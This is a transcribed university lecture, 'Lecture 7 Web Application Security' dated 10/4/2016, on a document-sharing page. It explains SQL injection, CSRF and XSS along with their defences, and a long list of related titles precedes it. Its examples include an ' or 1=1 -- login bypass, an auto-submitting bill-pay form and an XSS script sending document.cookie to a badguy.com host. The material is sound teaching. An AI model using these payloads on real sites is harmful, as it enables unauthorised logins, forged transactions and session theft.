Lecture 7. Web Application Security. Sunday 10/4/2016

Similar documents
Web Application Security

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Check list for web developers

Introduction to Computer Security

Where every interaction matters.

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Dawn Song

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Cross Site Scripting in Joomla Acajoom Component

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

The Top Web Application Attacks: Are you vulnerable?

Magento Security and Vulnerabilities. Roman Stepanov

Web application security

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Web Application Security

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Hack Proof Your Webapps

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

Security features of ZK Framework

Web Application Security Considerations

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Web Application Security

OWASP TOP 10 ILIA

Project 2: Web Security Pitfalls

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER

Øredev Web application testing using a proxy. Lucas Nelson, Symantec Inc.

OWASP Top Ten Tools and Tactics

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Criteria for web application security check. Version

Intrusion detection for web applications

Application security testing: Protecting your application and data

Testing the OWASP Top 10 Security Issues

WEB ATTACKS AND COUNTERMEASURES

Penetration Test Report

Web Application Firewall on SonicWALL SSL VPN

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Chapter 1 Web Application (In)security 1

ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus

Hacking de aplicaciones Web

Web Application Guidelines

Web Application Penetration Testing

(WAPT) Web Application Penetration Testing

Still Aren't Doing. Frank Kim

Using Free Tools To Test Web Application Security

Nuclear Regulatory Commission Computer Security Office Computer Security Standard

Secure Web Development Teaching Modules 1. Threat Assessment

Cross-Site Scripting

Application Security Testing. Generic Test Strategy

Ruby on Rails Secure Coding Recommendations

Essential IT Security Testing

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

Common Security Vulnerabilities in Online Payment Systems

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

What is Web Security? Motivation

Annex B - Content Management System (CMS) Qualifying Procedure

Columbia University Web Security Standards and Practices. Objective and Scope

Web and Security 1 / 40

State of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell

HTTPParameter Pollution. ChrysostomosDaniel

WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6

Secure development and the SDLC. Presented By Jerry

Statistics Whitepaper

Adobe Systems Incorporated

CSRF: Attack and Defense

Complete Cross-site Scripting Walkthrough

Software Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0

Web-Application Security

Recommended Practice Case Study: Cross-Site Scripting. February 2007

OWASP AND APPLICATION SECURITY

Attack and Penetration Testing 101

Sitefinity Security and Best Practices

CS 361S - Network Security and Privacy Fall Project #1

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

How To Fix A Web Application Security Vulnerability

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

SQL Injection. Slides thanks to Prof. Shmatikov at UT Austin

SECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting

elearning for Secure Application Development

EECS 398 Project 2: Classic Web Vulnerabilities

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Rational AppScan & Ounce Products

CTF Web Security Training. Engin Kirda

ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION

A Survey on Threats and Vulnerabilities of Web Services

Web Security Testing Cookbook*

Overview of the Penetration Test Implementation and Service. Peter Kanters

Cyber Security Workshop Ethical Web Hacking

Last update: February 23, 2004

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

Web Application Report

Transcription:

Lecture 7 Web Application Security Sunday 10/4/2016

Agenda Web Site Vulnerabilities SQL Injection Cross Site Request Forgery (CSRF) Cross-site scripting (XSS)

Three Top Web Site Vulnerabilities SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL query CSRF Cross-Site Request Forgery Bad web site sends browser request to good web site, using credentials of an innocent victim XSS Cross-Site Scripting Bad web site sends innocent victim a script that steals information from an honest web site

Three Top Web Site Vulnerabilities Attack Goals SQL Injection Uses SQL to change meaning of database command CSRF Cross-Site Request Forgery Leverage user s session at victim sever to perform actions XSS Cross-Site Scripting Inject malicious script into trusted context

SQL Injection Basic picture: Attacker s malicious code executed on victim server Victim Server 1 2 Attacker 3 receive valuable data unintended SQL query Victim SQL DB

SQL Injection Database queries with PHP Sample PHP $recipient = $_POST[ recipient ]; $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executequery($sql); Problem What if recipient is malicious string that changes the meaning of the query?

SQL Injection CardSystems Attack CardSystems credit card payment processing company SQL injection attack in June 2005 put out of business The Attack 263,000 credit card #s stolen from database credit card #s stored unencrypted 43 million credit card #s exposed

SQL Injection Case Study set ok = execute( "SELECT * FROM Users WHERE user=' " & form( user ) & " ' AND pwd=' " & form( pwd ) & ' ); if not ok.eof login success else fail; Is this exploitable?

SQL Injection Web Browser (Client) Enter Username & Password Web Server SELECT * FROM Users WHERE user='me' AND pwd='1234' DB Normal Query

SQL Injection Suppose user = ' or 1=1 -- (URL encoded) Then scripts does: ok = execute( SELECT WHERE user= ' ' or 1=1 -- ) The -- causes rest of line to be ignored. Now ok.eof is always false and login succeeds. The bad news: easy login to many sites this way.

SQL Injection How to prevent SQL injection attacks Examples Parameterized statements parameterized statement, rather than embedding user input in the statement, can be used (excluding arguments) Pattern check and sanitize the input Float, integer, Boolean, string parameters can be checked if their value is valid representation for the given type Employing input validation technique for authenticating user input against a set of defined rules for type, length and syntax and also against other rules Database permissions

Cross Site Request Forgery Introduction when a user visits a target website

Cross Site Request Forgery (CSRF) what happens in a CSRF attack?

Q: how long do you stay logged in to Gmail? Facebook?. Cross Site Request Forgery Basic picture: Attacker site forges request from Server Victim victim browser to victim server 1 4 2 User Victim Attack Server

Cross Site Request Forgery Example: User logs in to bank.com Session cookie remains in browser state as the browser is still open User visits another website containing: <form name=f action=http://bank.com/billpay.php> <input name=recipient value=badguy> <script> document.f.submit(); </script> Browser sends user authentication cookie with request Transaction will be fulfilled Problem: cookie authentication is insufficient when side effects occur

Cross Site Request Forgery Example (Money transfer) Form post with cookie

Cross Site Request Forgery Cookieless Example: Home Router Home router 1 4 2 User 3 Bad web site

Cross Site Request Forgery How to prevent CSRF attacks and reduce their threats? Examples of effective solutions Single per-page nonce insert a nonce into each form and also into a special slot in the server session compare the values of these two variables when the form is submitted Per-session nonce To overcome the usability weaknesses of the per-page nonce single token is created at the beginning of the session and is used throughout the session

Cross Site Request Forgery For User Protection Log out CSRF attacks generally require that the victim be logged into the target website Do not save basic authentication credentials Change default passwords Use different browsers Most CSRF targets require the victim to have an active session on the website in order for the attack to work Use a virtual machine use dedicated browser virtual machines (VMs), configured with a minimal OS and a web browser. Enforcement via proxies enforce the use of different browsers for visiting different classes of sites by using proxy servers and configuring the proxy settings on their users browsers

Cross Site Scripting (XSS) Basic scenario: Attacker s malicious code executed on victim browser Attack Server 1 2 5 Victim client Victim Server

Cross Site Scripting (XSS) XSS example: vulnerable website search field on victim.com: http://victim.com/search.php? term = apple Server-side implementation of search.php: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term]?> :... </BODY> </HTML> echo search term into response

Cross Site Scripting (XSS) Consider link: (properly URL encoded) http://victim.com/search.php? term = <script> window.open( http://badguy.com?cookie = + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> </script> 3. Browser executes script: Sends badguy.com cookie for victim.com

Cross Site Scripting (XSS) Attack Server www.attacker.com http://victim.com/search.php? term = <script>... </script> Victim client www.victim.com <html> Results for <script> window.open(http://attacker.com?... document.cookie...) </script> </html> Victim Server

Cross Site Scripting (XSS) What is XSS? An XSS vulnerability is present when an attacker can inject scripting code (e.g., Javascript) into pages generated by a web application Methods for injecting malicious code: Reflected XSS ( type 1 ) the attack script is reflected back to the user as part of a page from the victim site Stored XSS ( type 2 ) the attacker stores the malicious code in a resource managed by the web application, such as a database Others, such as DOM-based attacks ( type 0 XSS) malicious data are being reflected by the JavaScript code, fully on the victim client/user side

Cross Site Scripting (XSS) Basic scenario: reflected XSS attack Attack Server Email version 1 2 5 User Victim Server Victim

Cross Site Scripting (XSS) 2006 Example Vulnerability Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website Injected code redirected PayPal visitors to a page warning users their accounts had been compromised Victims were then redirected to a phishing site and prompted to enter sensitive financial data

Cross Site Scripting (XSS) Stored XSS Attack Server 1 User Victim Inject malicious Store script bad stuff Download it Server Victim

Cross Site Scripting (XSS) Stored XSS using images Suppose pic.jpg on web server contains HTML! request for http://site.com/pic.jpg results in: HTTP/1.1 200 OK Content-Type: image/jpeg <html> fooled ya </html> The browser will render this as HTML (despite Content-Type) Consider photo sharing sites that support image uploads What if attacker uploads an image that is a script?

Cross Site Scripting (XSS) The best way to protect against XSS attacks Validates all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) Do not attempt to identify active content (i.e., interactive website content)and remove, filter, or sanitize it There are too many types of active content and too many ways of encoding it to get around filters for such content. Adopt a positive security policy that specifies what is allowed. Negative or attack signature based policies are difficult to maintain and are likely to be incomplete

Complex problems in social network sites User data Usersupplied application - Some social networking sites allow users to build and upload their own applications - Applications are unrestricted JavaScript that runs on the users browser, then the JavaScript from an application could read user information, act as the user or do other malicious actions

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information